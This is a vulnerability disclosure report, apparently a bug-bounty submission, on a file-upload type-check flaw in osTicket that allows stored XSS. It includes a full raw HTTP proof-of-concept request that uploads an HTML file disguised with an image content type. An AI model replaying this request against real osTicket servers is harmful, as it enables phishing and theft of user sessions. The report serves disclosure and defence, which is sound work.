Description

As it is written on github profile, osTicket is a widely-used open source support ticket system. During source code research I discovered bad uploaded file type check, which is controlled by user. Unauthenticated user can upload malicious html/js file.

FROM OWASP:: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Proof of Concept

POST /ajax.php/draft/ticket.client.jfi710uc6f1h/attach HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------124988469840978117853377254190
Content-Length: 6456
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/open.php
Cookie: OSTSESSID=2h2moaijbnk5nojfi710uc6f1h

-----------------------------124988469840978117853377254190
Content-Disposition: form-data; name="file[]"; filename="osticket-phish.html"
Content-Type: image/png,text/html

<html>
<img src>
&lt;/html&gt;

-----------------------------124988469840978117853377254190--

PoC Video

https://www.youtube.com/watch?v=iasn6dEDnCw

Impact

FROM OWASP:: An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

In this case local link generated link is valid for few hours, and is visible by issue author and administrators.